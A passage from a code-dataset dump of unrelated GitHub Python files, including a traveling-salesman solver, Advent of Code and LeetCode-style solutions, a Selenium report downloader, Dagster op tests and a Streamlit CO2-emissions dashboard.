counter\r\n iteration = 1\r\n \r\n # Loop until the stopping criteria are met\r\n while temperature > stopping_temperature and iteration < stopping_iter:\r\n # Choose two random cities to swap\r\n i, j = random.sample(range(len(current_tour)), 2)\r\n \r\n # Swap the cities to get a new tour\r\n new_tour = current_tour.copy()\r\n new_tour[i], new_tour[j] = new_tour[j], new_tour[i]\r\n # Calculate the length of the new tour\r\n new_length = tour_length(new_tour,cities)\r\n \r\n # Decide whether to accept the new tour\r\n if acceptance_probability(current_length, new_length, temperature) > random.random():\r\n current_tour = new_tour\r\n current_length = new_length\r\n \r\n # Update the best tour if necessary\r\n if current_length < best_length:\r\n best_tour = current_tour.copy()\r\n best_length = current_length\r\n \r\n # Update the temperature and iteration counter\r\n temperature *= cooling_rate\r\n iteration += 1\r\n \r\n return best_tour, best_length\r\n\r\n\r\n\r\n\r\n# Define the main function\r\ndef main():\r\n # Define the command-line arguments\r\n parser = argparse.ArgumentParser('choose one')\r\n \r\n parser.add_argument('--algorithm', choices=[ 'hc', 'sa'], required=True,\r\n help='Algorithm to use (hc: Hill Climbing, sa: Simulated Annealing)')\r\n parser.add_argument('--file', type=str, help='The input file containing the city list')\r\n # Parse the command-line arguments\r\n args = parser.parse_args()\r\n \r\n cities = load_cities(args.file)\r\n\r\n \r\n # Set the parameters for the Simulated Annealing algorithm\r\n temperature = 1000.0\r\n cooling_rate = 0.99\r\n stopping_temperature = 1e-8\r\n stopping_iter = 1000\r\n \r\n if args.algorithm == 'hc':\r\n current_path,current_distance,path, distance = hill_climb(cities)\r\n print('rando path:', ' -> '.join( current_path))\r\n print('rando path Distance:', current_distance)\r\n print('Best path:', ' -> '.join(path))\r\n print('Distance:', distance)\r\n elif args.algorithm == 'sa':\r\n best_tour, best_length = simulated_annealing(cities, temperature, cooling_rate, stopping_temperature, stopping_iter)\r\n print('Best Tour:', best_tour)\r\n print('Best Tour Length:', best_length)\r\n \r\n start=time()\r\n # Run the Simulated Annealing algorithm\r\n best_tour, best_length = simulated_annealing( cities, temperature, cooling_rate, stopping_temperature, stopping_iter)\r\n \r\n # Print the results\r\n print('Best Tour:', best_tour)\r\n print('Best Tour Length:', best_length)\r\n end=time()\r\n print(end-start, 'secs')\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"bezagetaneh/Localserach","sub_path":"TSP.py","file_name":"TSP.py","file_ext":"py","file_size_in_byte":5973,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25437058229","text":"import re\nf = open('day4.txt', 'r')\n\nproperties = {'byr', 'iyr','eyr', 'hgt','hcl', 'ecl', 'pid'}\nvalid=0\n\ndict={}\n\nfor lines in f:\n if lines!='\\n':\n list = re.split(r'[: \\n]',lines) # creates an emtpy list item at the end because newline is a \\s character so delete\n # print(list) #problem in the last line with no return also not spliting the way I want\n if list[-1] =='':\n list.pop() #if newline, remove from list\n for e in range(0,len(list)-1,2):\n dict[list[e]] = list[e+1]\n # print(dict)\n else:\n if properties.issubset(dict.keys()):\n print('all correct')\n print(dict)\n valid+=1\n dict.clear() #reset dictionary\nif properties.issubset(dict.keys()):\n print('all correct')\n print(dict)\n valid+=1\n \nprint(valid)\n","repo_name":"01bbae/adventofcode2020","sub_path":"day4-1.py","file_name":"day4-1.py","file_ext":"py","file_size_in_byte":862,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19236826116","text":"import datetime\nimport os\nimport time\n\nfrom bs4 import BeautifulSoup\nfrom openpyxl import load_workbook\nfrom selenium.webdriver.common.by import By\n\nfrom .agency_driver import AgencyDriver\n\n\ndef generate_default_report_name():\n # today = datetime.date.today() # TODO: uncomment when using for real\n today = datetime.date(2021, 12, 28) # TODO: comment when using for real\n first = today.replace(day=1)\n last_month = first - datetime.timedelta(days=1)\n last_month_number = last_month.strftime(\"%m\")\n last_year_number = last_month.strftime(\"%Y\")\n current_month_number = today.strftime(\"%m\")\n current_year_number = today.strftime(\"%Y\")\n return f'statystyki_oferty_26-{last_month_number}-{last_year_number}_25-{current_month_number}-{current_year_number}.xlsx'\n\n\ndef generate_stats_sheet_default_name():\n # today = datetime.date.today() # TODO: uncomment when using for real\n today = datetime.date(2021, 12, 27) # TODO: comment when using for real\n first = today.replace(day=1)\n last_month = first - datetime.timedelta(days=1)\n last_month_number = last_month.strftime(\"%m\")\n last_year_number = last_month.strftime(\"%Y\")\n current_month_number = today.strftime(\"%m\")\n current_year_number = today.strftime(\"%Y\")\n return f'Statystyk_{last_year_number}-{last_month_number}-26_{current_year_number}-{current_month_number}-25'\n\n\ndefault_report_name = generate_default_report_name()\nstats_sheet_default_name = generate_stats_sheet_default_name()\nreports_path = '/home/kajetan/Documents/pryzmat/reports/'\n\n\ndef click_to_generate_report(username, driver):\n print(f'generate report for account: {username}')\n driver.open_client_and_stats(username)\n driver.set_ads_type('sponsored')\n driver.set_date_range('last_billing_month')\n driver.set_detail_level('offers')\n driver.click((By.XPATH, '//*[@id=\"layoutBody\"]/div/div/div[3]/div[2]/button[3]'))\n\n\ndef generate_reports(accounts_list):\n print('function generate reports started')\n # if datetime.date.today().day < 26:\n # raise Exception(\"It is too early for generating reports for previous billing month\")\n driver = AgencyDriver()\n for account in accounts_list:\n click_to_generate_report(account, driver)\n print('function generate reports finished, reports are now generated')\n\n\ndef check_for_report(username, driver):\n print(f'check for report for account: {username}')\n driver.open_client(username)\n driver.open_my_files()\n time.sleep(1)\n soup = BeautifulSoup(driver.page_source, 'html5lib')\n tags = soup.findAll(string=default_report_name)\n for tag in tags:\n if tag.parent.name != 'strong':\n parent = tag.parent.parent\n status = parent.findAll('div')[3].text.strip('Status')\n return status == 'Gotowe'\n\n\ndef check_for_reports(accounts_list):\n print(f'function check for reports started')\n driver = AgencyDriver()\n ready = 0\n for account in accounts_list:\n if check_for_report(account, driver):\n ready += 1\n else:\n return False\n print(f'function check for reports finished')\n return ready == len(accounts_list)\n\n\ndef rename_and_format_file(username):\n file_path = reports_path + default_report_name\n wb = load_workbook(filename=file_path)\n stats_sheet_name = 'Statystyk_' + stats_sheet_default_name\n del wb[stats_sheet_name]\n ws = wb.active\n ws.delete_cols(1, 2)\n # TODO: sort data\n # TODO: add default columns width\n new_file_path = reports_path + f'raport-{username}.xlsx'\n wb.save(new_file_path)\n os.remove(file_path)\n\n\ndef download_report(username, driver):\n print(f'download report for account: {username}')\n driver.open_client(username)\n driver.open_my_files()\n time.sleep(1)\n driver.click((By.CSS_SELECTOR, 'button[title=\"Pobierz plik\"]'))\n time.sleep(2)\n rename_and_format_file(username)\n\n\ndef download_reports(accounts_list):\n print(f'function download reports started')\n driver = AgencyDriver()\n for account in accounts_list:\n download_report(account, driver)\n print(f'function download reports finished')\n\n\ndef run_reports_downloader(accounts_list):\n print(f'started reports downloader for {len(accounts_list)} accounts')\n generate_reports(accounts_list)\n sleep_time = 60 * 2\n reports_ready = False\n while not reports_ready:\n time.sleep(sleep_time)\n time_now = datetime.datetime.now().strftime(\"%H:%M:S\")\n print(f'{time_now}, next check if reports are ready in: {sleep_time / 60} minutes')\n reports_ready = check_for_reports(accounts_list)\n download_reports(accounts_list)\n\n","repo_name":"katek1094/allegroAds","sub_path":"src/agency_panel/reports_downloader.py","file_name":"reports_downloader.py","file_ext":"py","file_size_in_byte":4658,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38896935949","text":"from phone_book import MyPhoneBook\n\n\ndef hello():\n while True:\n print(\"Welcome to Your Phone Book.\")\n printing_value = [\"1. Add Contact\", \"2. Modify Contact.\", \"3. Delete Contact \", \"4. See all Contacts\",\n \"5. Get Contact by Name.\", \"6. Sorted Contact\"]\n for ps in range(len(printing_value)):\n print(printing_value[ps])\n number = int(input(\"enter your choice \"))\n if number == 1:\n MyPhoneBook().add_contact()\n if number == 2:\n MyPhoneBook().modify_contact()\n if number == 3:\n MyPhoneBook().delete_contact()\n if number == 4:\n MyPhoneBook().get_all_contacts()\n if number == 5:\n MyPhoneBook().get_contact()\n if 0 > number < 6:\n print(\"Invalid number entered. Please try again: \")\n\n\ndef main():\n hello()\n\nif __name__ == \"__main__\":\n main()\n \n","repo_name":"heenabaheti/python-programs","sub_path":"phone_book/handeler.py","file_name":"handeler.py","file_ext":"py","file_size_in_byte":926,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21454978645","text":"# -*- coding: utf-8 -*-\nclass Solution(object):\n def findAllCombo(self, nums):\n res = []\n nums.sort()\n for i in range(len(nums)-2):\n if i == 0 or nums[i-1] != nums[i]:\n l = i+1\n r = len(nums)-1\n while l < r:\n sum = nums[i]**2 + nums[l]**2\n if sum == nums[r]**2:\n res.append((nums[i],nums[l],nums[r]))\n break\n elif sum < nums[r]**2:\n l += 1\n else:\n r -= 1\n return res\n\nassert Solution().findAllCombo([6,7,8,10]) == [(6,8,10)]","repo_name":"jerrt2003/leetcode-in-python","sub_path":"Interview_Feedback/Google/15. 3Sum/變形/Solution.py","file_name":"Solution.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29635282090","text":"import argparse\nimport logging\nfrom pathlib import Path\n\nimport openeo\nfrom openeo.internal.graph_building import PGNode\nfrom openeo.rest.vectorcube import VectorCube\n\nfrom utils import read_geojson, read_udf\n\nlogging.basicConfig(level=logging.INFO, format='%(asctime)s %(levelname)-8s %(message)s')\n\ndef get_script_args():\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\"-f\", \"--file\", required=True,\n help=\"GeoJSON based file that contains the input fields to process\")\n parser.add_argument(\"-b\", \"--batch\", action='store_true',\n help=\"Generate the results in batch mode\")\n parser.add_argument(\"-o\", \"--output\", default='../files/dem',\n help=\"File path where to store the results\")\n return parser.parse_args()\n\n\ndef setup_openeo():\n return openeo.connect(\"http://openeo.vito.be\").authenticate_oidc()\n\n\ndef create_bbox(connection, features: dict) -> VectorCube:\n return VectorCube(connection=connection,\n graph=PGNode(\n process_id='run_udf',\n arguments={\n 'runtime': 'Python',\n 'udf': read_udf('create_bbox.py'),\n 'data': features\n }\n ))\n\nif __name__ == '__main__':\n\n args = get_script_args()\n\n features = read_geojson(Path(args.file))\n connection = setup_openeo()\n features = create_bbox(connection, features)\n dc = connection.load_collection('SENTINEL2_L2A_SENTINELHUB',\n bands=[\"B03\", \"B04\", \"B08\", \"sunAzimuthAngles\", \"sunZenithAngles\", \"viewAzimuthMean\",\n \"viewZenithMean\", 'SCL']) \\\n .filter_temporal(['2023-01-01', '2023-01-10'])\n dc = dc.mask_polygon(features)\n\n\n if args.batch:\n dc_job = dc.send_job(out_format=\"GTiff\", title=f'Variability Map',\n sample_by_feature=False)\n dc_job.start_and_wait().get_results().download_files(args.output)\n else:\n output = Path(f'{args.output}/result.tiff')\n output.parent.mkdir(parents=True, exist_ok=True)\n dc.download(output, format='GTiff')\n\n\n\n","repo_name":"JanssenBrm/openeo-samples","sub_path":"services/dem.py","file_name":"dem.py","file_ext":"py","file_size_in_byte":2277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25679623707","text":"import albumentations as A\nfrom albumentations.pytorch import ToTensorV2\nimport torch.utils.data as data\n\nfrom .datasets import ACDC\n\n\ndef _data_transforms_acdc():\n mean = [0.485, 0.456, 0.406]\n std = [0.229, 0.224, 0.225]\n train_transform = A.Compose(\n [\n A.Normalize(mean=mean, std=std),\n A.RandomCrop(512, 512, p=1.0),\n # A.ColorJitter(brightness=0.5, contrast=0.5, saturation=0.5),\n A.VerticalFlip(p=0.5),\n A.RandomRotate90(p=0.5),\n ToTensorV2(),\n ]\n )\n\n valid_transform = A.Compose(\n [A.Normalize(mean=mean, std=std), A.CenterCrop(512, 512, p=1.0), ToTensorV2(),]\n )\n\n return train_transform, valid_transform\n\n\ndef get_dataloader_acdc(\n root, train=True, batch_size=32, client_id=None, out_client=False\n):\n train_transform, valid_transform = _data_transforms_acdc()\n\n transform = train_transform if train else valid_transform\n dataset = ACDC(root, train, transform, client_id, out_client)\n dataloader = data.DataLoader(\n dataset, batch_size=batch_size, shuffle=True, num_workers=4\n )\n\n return dataloader\n","repo_name":"Lee-Gihun/FedSeg","sub_path":"train_tools/preprocessing/acdc/loader.py","file_name":"loader.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74726756327","text":"from flask_restful import Resource\r\nfrom endpoints import IsEmirleri\r\nfrom bin import Optimizer\r\n\r\nclass Optimizasyon(Resource):\r\n def __init__(self, database):\r\n self.is_emirleri = IsEmirleri.IsEmirleri(database) \r\n self.optimizer = Optimizer.Optimizer(self.is_emirleri) \r\n \r\n def get(self, tezgah=None, meydanci=None, sehpa=None, is_bagi=None):\r\n self.optimizer.gercege_donustur(self.optimizer.optimize(tezgah, meydanci, sehpa, is_bagi))\r\n\r\n return self.is_emirleri.get()\r\n","repo_name":"berkaydedeoglu/ACYS_Rest_API","sub_path":"endpoints/Optimizasyon.py","file_name":"Optimizasyon.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36370006396","text":"from datetime import datetime\nfrom ...views.base_views import BaseView\nfrom ...pbb.tools import FixKantor\nfrom pyramid.view import view_config\nfrom pyramid.httpexceptions import (\n HTTPFound,\n HTTPForbidden,\n )\n\nclass PbbView(BaseView):\n def __init__(self, request):\n super(PbbView, self).__init__(request)\n self.kd_kantor = 'kd_kantor' in self.ses and self.ses['kd_kantor'] or '01'\n self.kd_kanwil = 'kd_kanwil' in self.ses and self.ses['kd_kanwil'] or '01'\n self.ses['kd_kantor'] = self.kd_kantor\n self.ses['kd_kanwil'] = self.kd_kanwil\n \n########\n# Home #\n########\nclass HomeView(PbbView):\n def __init__(self, request):\n super(HomeView, self).__init__(request)\n\n @view_config(route_name='F100000', renderer='templates/home.pt',\n permission='')\n def view_home(self):\n return dict(project='pbb')\n\n ","repo_name":"aagusti/opensipkd-pajak","sub_path":"pajak/pbb/views/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71888422569","text":"# 백준 2831 댄스파티\n\nn = int(input())\nm = list(map(int,input().split()))\nw = list(map(int,input().split()))\nm_pos = list()\nw_pos = list()\nm_neg = list()\nw_neg = list()\n\nfor i in range(n):\n if m[i] > 0:\n m_pos.append(m[i])\n else:\n m_neg.append(abs(m[i]))\n if w[i] > 0:\n w_pos.append(w[i])\n else:\n w_neg.append(abs(w[i]))\n\nanswer = 0\nm_pos.sort()\nm_neg.sort()\nw_pos.sort()\nw_neg.sort()\n\nl = 0\nr = 0\n\nwhile l < len(m_pos) and r < len(w_neg):\n if m_pos[l] < w_neg[r]:\n answer += 1\n l += 1\n r += 1\n else:\n r += 1\n\nl = 0\nr = 0\nwhile l < len(w_pos) and r < len(m_neg):\n if w_pos[l] < m_neg[r]:\n answer += 1\n l += 1\n r += 1\n else:\n r += 1\n\nprint(answer)\n\n","repo_name":"do0134/solostudy","sub_path":"algorithm/11월/1103/3sol.py","file_name":"3sol.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"9890068727","text":"import sys\nfrom typing import Generator, Iterable, Iterator\n\nimport pytest\nfrom dagster import AssetKey, DynamicOut, DynamicOutput, In, Out, Output, op\nfrom dagster._core.errors import DagsterInvalidDefinitionError\nfrom dagster._legacy import InputDefinition, OutputDefinition\n\n\ndef test_flex_inputs():\n @op(ins={\"arg_b\": In(metadata={\"explicit\": True})})\n def partial(_context, arg_a, arg_b):\n return arg_a + arg_b\n\n assert partial.input_defs[0].name == \"arg_b\"\n assert partial.input_defs[0].metadata[\"explicit\"]\n assert partial.input_defs[1].name == \"arg_a\"\n\n\ndef test_merge_type():\n @op(ins={\"arg_b\": In(metadata={\"explicit\": True})})\n def merged(_context, arg_b: int):\n return arg_b\n\n assert (\n merged.input_defs[0].dagster_type == InputDefinition(\"test\", dagster_type=int).dagster_type\n )\n assert merged.input_defs[0].metadata[\"explicit\"]\n\n\ndef test_merge_desc():\n @op(ins={\"arg_b\": In(metadata={\"explicit\": True})})\n def merged(_context, arg_a, arg_b, arg_c):\n \"\"\"Testing.\n\n Args:\n arg_b: described\n \"\"\"\n return arg_a + arg_b + arg_c\n\n assert merged.input_defs[0].name == \"arg_b\"\n assert merged.input_defs[0].description == \"described\"\n assert merged.input_defs[0].metadata[\"explicit\"]\n\n\ndef test_merge_default_val():\n @op(ins={\"arg_b\": In(dagster_type=int, metadata={\"explicit\": True})})\n def merged(_context, arg_a: int, arg_b=3, arg_c=0):\n return arg_a + arg_b + arg_c\n\n assert merged.input_defs[0].name == \"arg_b\"\n assert merged.input_defs[0].default_value == 3\n assert (\n merged.input_defs[0].dagster_type == InputDefinition(\"test\", dagster_type=int).dagster_type\n )\n\n\ndef test_precedence():\n @op(\n ins={\n \"arg_b\": In(\n dagster_type=str,\n default_value=\"hi\",\n description=\"legit\",\n metadata={\"explicit\": True},\n input_manager_key=\"rudy\",\n asset_key=AssetKey(\"table_1\"),\n asset_partitions={\"0\"},\n )\n }\n )\n def precedence(_context, arg_a: int, arg_b: int, arg_c: int):\n \"\"\"Testing.\n\n Args:\n arg_b: boo\n \"\"\"\n return arg_a + arg_b + arg_c\n\n assert precedence.input_defs[0].name == \"arg_b\"\n assert (\n precedence.input_defs[0].dagster_type\n == InputDefinition(\"test\", dagster_type=str).dagster_type\n )\n assert precedence.input_defs[0].description == \"legit\"\n assert precedence.input_defs[0].default_value == \"hi\"\n assert precedence.input_defs[0].metadata[\"explicit\"]\n assert precedence.input_defs[0].input_manager_key == \"rudy\"\n assert precedence.input_defs[0].get_asset_key(None) is not None\n assert precedence.input_defs[0].get_asset_partitions(None) is not None\n\n\ndef test_output_merge():\n @op(out={\"four\": Out()})\n def foo(_) -> int:\n return 4\n\n assert foo.output_defs[0].name == \"four\"\n assert foo.output_defs[0].dagster_type == OutputDefinition(int).dagster_type\n\n\ndef test_iter_out():\n @op(out={\"A\": Out()})\n def _ok(_) -> Iterator[Output]:\n yield Output(\"a\", output_name=\"A\")\n\n @op\n def _also_ok(_) -> Iterator[Output]:\n yield Output(\"a\", output_name=\"A\")\n\n @op\n def _gen_too(_) -> Generator[Output, None, None]:\n yield Output(\"a\", output_name=\"A\")\n\n @op(out={\"A\": Out(), \"B\": Out()})\n def _multi_fine(_) -> Iterator[Output]:\n yield Output(\"a\", output_name=\"A\")\n yield Output(\"b\", output_name=\"B\")\n\n\ndef test_dynamic():\n @op(out=DynamicOut(dagster_type=int))\n def dyn_desc(_) -> Iterator[DynamicOutput]:\n \"\"\"\n Returns:\n numbers.\n \"\"\" # noqa: D212\n yield DynamicOutput(4, \"4\")\n\n assert dyn_desc.output_defs[0].description == \"numbers.\"\n assert dyn_desc.output_defs[0].is_dynamic\n\n\n@pytest.mark.skipif(\n sys.version_info < (3, 7),\n reason=(\n \"typing types isinstance of type in py3.6,\"\n \" https://github.com/dagster-io/dagster/issues/4077\"\n ),\n)\ndef test_not_type_input():\n with pytest.raises(\n DagsterInvalidDefinitionError,\n match=(\n r\"Problem using type '.*' from type annotation for argument 'arg_b', correct the issue\"\n r\" or explicitly set the dagster_type\"\n ),\n ):\n\n @op\n def _create(\n _context,\n # invalid since Iterator is not a python type or DagsterType\n arg_b: Iterator[int],\n ):\n return arg_b\n\n with pytest.raises(\n DagsterInvalidDefinitionError,\n match=(\n r\"Problem using type '.*' from type annotation for argument 'arg_b', correct the issue\"\n r\" or explicitly set the dagster_type\"\n ),\n ):\n\n @op(ins={\"arg_b\": In()})\n def _combine(\n _context,\n # invalid since Iterator is not a python type or DagsterType\n arg_b: Iterator[int],\n ):\n return arg_b\n\n with pytest.raises(\n DagsterInvalidDefinitionError,\n match=(\n r\"Problem using type '.*' from return type annotation, correct the issue or explicitly\"\n r\" set the dagster_type\"\n ),\n ):\n\n @op\n def _out(_context) -> Iterable[int]:\n return [1]\n","repo_name":"dagster-io/dagster","sub_path":"python_modules/dagster/dagster_tests/definitions_tests/test_op_io.py","file_name":"test_op_io.py","file_ext":"py","file_size_in_byte":5337,"program_lang":"python","lang":"en","doc_type":"code","stars":8986,"dataset":"github-code","pt":"53"} +{"seq_id":"31939224004","text":"import view, model, pygame, sys, constants\nfrom model import MoveType\n\nclass GameController:\n def __init__(self, SCREEN):\n self.board = model.GameBoard()\n self.SCREEN = SCREEN\n self.VIEW = view.GameView(SCREEN, self.board.getPieces())\n self.VIEW.drawBoard()\n self.board.addObserver(self.VIEW)\n\n def tryMove(self, event):\n mouseX, mouseY = event.pos\n x = mouseX // constants.TILE_SIZE\n y = mouseY // constants.TILE_SIZE\n move = self.VIEW.selectedPiece.piece.canMove(x, y, self.board)\n if move != MoveType.INVALID:\n if move == MoveType.PROMOTION:\n self.VIEW.flipBars()\n self.board.movePiece(x, y, self.VIEW.selectedPiece.piece, move)\n self.VIEW.selectedPiece = None\n\n\n else:\n self.VIEW.abortMove()\n\n def handle(self, event):\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n\n elif event.type == pygame.MOUSEBUTTONDOWN:\n self.VIEW.selectPiece(event)\n self.VIEW.currentbar.tryButtons(event)\n elif event.type == pygame.MOUSEBUTTONUP and self.VIEW.selectedPiece:\n self.tryMove(event)\n elif event.type == pygame.MOUSEMOTION:\n self.VIEW.dragPiece(event)\n\n\n\n\n\n\n","repo_name":"finnstew/chess","sub_path":"controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":1300,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"5465968299","text":"#updated on 6 June 2021\nimport chart_desciption\nimport plotly.express as px\nimport streamlit as st\nimport pandas as pd\n\nimport altair as alt\nfrom plotly import graph_objs as go\n\n# set page layout\nst.set_page_config(\n page_title=\"COMPX532A - Final Project Andrew CHOI\",\n page_icon=\"🌍\",\n initial_sidebar_state=\"expanded\"\n)\n\n\n@st.cache\ndef load_data():\n dataframe = pd.read_csv('https://raw.githubusercontent.com/owid/co2-data/master/owid-co2-data.csv')\n return dataframe\n\n\n# clean the datasets\n@st.cache\ndef trim_datasets(dataframe):\n # trim the dataframe\n df = dataframe.drop(columns=['co2_growth_prct', 'co2_growth_abs', 'consumption_co2',\n 'consumption_co2_per_capita', 'share_global_co2', 'share_global_cumulative_co2',\n 'co2_per_gdp', 'consumption_co2_per_gdp', 'co2_per_unit_energy',\n 'cement_co2_per_capita',\n 'coal_co2_per_capita', 'flaring_co2_per_capita', 'gas_co2_per_capita',\n 'oil_co2_per_capita',\n 'other_co2_per_capita', 'share_global_coal_co2', 'share_global_oil_co2',\n 'share_global_gas_co2',\n 'share_global_flaring_co2', 'share_global_cement_co2',\n 'share_global_cumulative_coal_co2',\n 'share_global_cumulative_oil_co2', 'share_global_cumulative_gas_co2',\n 'share_global_cumulative_flaring_co2',\n 'share_global_cumulative_cement_co2', 'total_ghg', 'ghg_per_capita', 'methane',\n 'methane_per_capita', 'nitrous_oxide',\n 'nitrous_oxide_per_capita', 'primary_energy_consumption', 'energy_per_capita',\n 'energy_per_gdp'])\n # df = df[['iso_code','country','year','co2','co2_per_capita',\n # 'trade_co2','cement_co2','coal_co2','flaring_co2',\n # 'gas_co2','oil_co2','other_industry_co2','cumulative_co2',\n # 'cumulative_coal_co2','cumulative_oil_co2','cumulative_gas_co2',\n # 'cumulative_flaring_co2','cumulative_cement_co2','population','gdp']]\n return df\n\n\ndef get_df_year_mx_mi(dataframe):\n min_year = int(dataframe['year'].min())\n max_year = int(dataframe['year'].max())\n return min_year, max_year\n\n\n# checkbox to show all data\ndef check_box_show(df):\n check_box_sd = st.checkbox('Show All Data')\n if check_box_sd:\n st.dataframe(df)\n return\n\n\n# set up the data frame for choropleth map\ndef control_dataframe(dataframe):\n df = dataframe.loc[dataframe['year'] == select_year]\n df['population'] = df['population'].map('{:,}'.format) # format the integer with comma\n df['gdp'] = df['gdp'].map('{:,}'.format) # format the integer with comma\n df['population'] = df['population'].astype(str) # change the data type to string for concatenation\n df['gdp'] = df['gdp'].astype(str) # change the data type to string for concatenation\n df['text'] = df['country'] + '
Population: ' + df['population'] + '
GDP: ' + df['gdp']\n df_columns_list = df.columns.tolist()\n df_columns_list.remove('iso_code')\n df_columns_list.remove('country')\n df_columns_list.remove('year')\n df_columns_list.remove('population')\n df_columns_list.remove('gdp')\n return df, df_columns_list\n\n\n@st.cache\ndef get_co2_choropleth_map(dataframe, year, select_sector):\n fig_choropleth = go.Figure(data=go.Choropleth(\n locations=dataframe['iso_code'],\n z=dataframe[select_sector],\n text=dataframe['text'],\n colorscale='agsunset',\n autocolorscale=False,\n reversescale=True,\n marker_line_color='darkgray',\n marker_line_width=1,\n colorbar_title='CO2
million tonnes',\n ))\n\n fig_choropleth.update_layout(\n title_text='' + 'CO2 Emission in ' + str(year) + ' (Sector in ' + select_sector + ')',\n geo=dict(\n showframe=True,\n showcoastlines=True,\n projection_type=\"orthographic\",\n showocean=True,\n oceancolor='deepskyblue',\n showlakes=True,\n lakecolor='lightblue'\n ),\n )\n\n fig_choropleth.update_layout(margin={\"r\": 30, \"t\": 30, \"l\": 30, \"b\": 30},\n title_font=dict(\n size=20,\n color='Blue')\n )\n return fig_choropleth\n\n\n@st.cache\ndef animated_bar(dataframe, dataset_column):\n df_region_area = dataframe[dataframe['iso_code'].isnull()]\n df_region_area = df_region_area.loc[(df_region_area[\"country\"] != \"French Equatorial Africa\") &\n (df_region_area[\"country\"] != \"French West Africa\") &\n (df_region_area[\"country\"] != \"Kuwaiti Oil Fires\") &\n (df_region_area[\"country\"] != \"Leeward Islands\") &\n (df_region_area[\"country\"] != \"Macao\") &\n (df_region_area[\"country\"] != \"Micronesia\") &\n (df_region_area[\"country\"] != \"Panama Canal Zone\") &\n (df_region_area[\"country\"] != \"Ryukyu Islands\") &\n (df_region_area[\"country\"] != \"St. Kitts-Nevis-Anguilla\")]\n df_region_area = df_region_area.fillna(0)\n df_region_area = df_region_area.pivot(index='year', columns='country', values=dataset_column)\n # create year as new column, some countries missing year in original datasets\n df_region_area['year'] = df_region_area.index\n # melt the data, now each country has the same year value\n df_region_area = df_region_area.melt(id_vars=['year'], var_name=['country'], value_name=dataset_column)\n cat_max_year = int(df_region_area[select_co2_sector].max()) * 1.1\n # plot an animated bar\n fig_animated = px.bar(df_region_area,\n x='country',\n y=dataset_column,\n color='country',\n animation_frame='year',\n animation_group='country',\n range_y=[0, cat_max_year],\n height=600,\n title=\"Running bar chart of \" + dataset_column + \"\"\n )\n return fig_animated\n\n\n# show the bar chart of top 10 / lowest 10\ndef show_bar_top_low_10(dataframe, data_column, year):\n st.subheader(\"Which countries are the Top 10 or Lowest 10?\")\n df = dataframe[dataframe['iso_code'].notnull()]\n df = df[df['iso_code'] != 'OWID_WRL']\n df_top10 = df.nlargest(10, data_column)\n df_low10 = df.nsmallest(10, data_column)\n high_or_low = st.radio('Select to display the Highest/Lowest 10 CO2 emission:',\n ['Highest 10', 'Lowest 10']) # .radio('Select to Highest 10 / Lowest 10', )\n fig_bar = go.Figure()\n if high_or_low == 'Highest 10':\n fig_bar = go.Figure(data=[go.Bar(\n x=df_top10['country'], y=df_top10[data_column],\n text=df_top10[data_column],\n textposition='auto',\n )])\n elif high_or_low == 'Lowest 10':\n fig_bar = go.Figure(data=[go.Bar(\n x=df_low10['country'], y=df_low10[data_column],\n text=df_low10[data_column],\n textposition='auto',\n )])\n\n fig_bar.update_traces(marker_color='rgb(51,255,149)', marker_line_color='rgb(8,48,107)',\n marker_line_width=1.5, opacity=0.6)\n fig_bar.update_layout(title_text='' + high_or_low\n + ' countries of CO2 emission in '\n + str(year)\n + ' (' + data_column + ')' + '',\n title_font=dict(size=18)\n )\n return fig_bar\n\n\n# scatter graph for GDP vs Population vs CO2 emission\ndef show_scatter_gdp_vs_pop(dataframe, data_column, year):\n # plot the scatter chart (GDP vs Population vs Selected category)\n st.subheader(\"Relationship between GDP, Population and CO2 emission\")\n df_gdp_pop_cat = dataframe[['year', 'country', 'iso_code', data_column, 'gdp', 'population']]\n df_gdp_pop_cat = df_gdp_pop_cat[df_gdp_pop_cat['year'] == year] # filter out the year\n df_gdp_pop_cat = df_gdp_pop_cat[df_gdp_pop_cat['iso_code'].notnull()] # filter out no iso code area\n df_gdp_pop_cat = df_gdp_pop_cat[df_gdp_pop_cat['iso_code'] != 'OWID_WRL'] # filter out world data\n # create an altair chart dictionary\n scatter_chart = alt.Chart(df_gdp_pop_cat).mark_circle().encode(\n x='gdp', y='population',\n size=alt.Size(data_column, scale=alt.Scale(range=[100, 2000])),\n color=alt.Color('country', legend=alt.Legend(columns=2)),\n opacity='country',\n tooltip=['country', 'gdp', 'population', data_column]).properties(\n title='GDP vs Population vs ' + data_column + ' in ' + str(year)\n ).interactive()\n\n scatter_chart = alt.layer(scatter_chart).configure_title(\n fontSize=20, anchor=\"middle\").configure_view(\n continuousHeight=500\n )\n # st.dataframe(df_gdp_pop_cat)\n return scatter_chart\n\n\n# plot the line chart\ndef show_line_chart(dataframe):\n list_country = dataframe['country'].unique().tolist()\n st.subheader(\"Time Series of CO2 emission\")\n col1, col2 = st.beta_columns(2)\n col1.subheader('Select Country')\n col2.subheader('Select Mode')\n\n select_list_country = col1.selectbox('', list_country, index=232)\n select_mode = 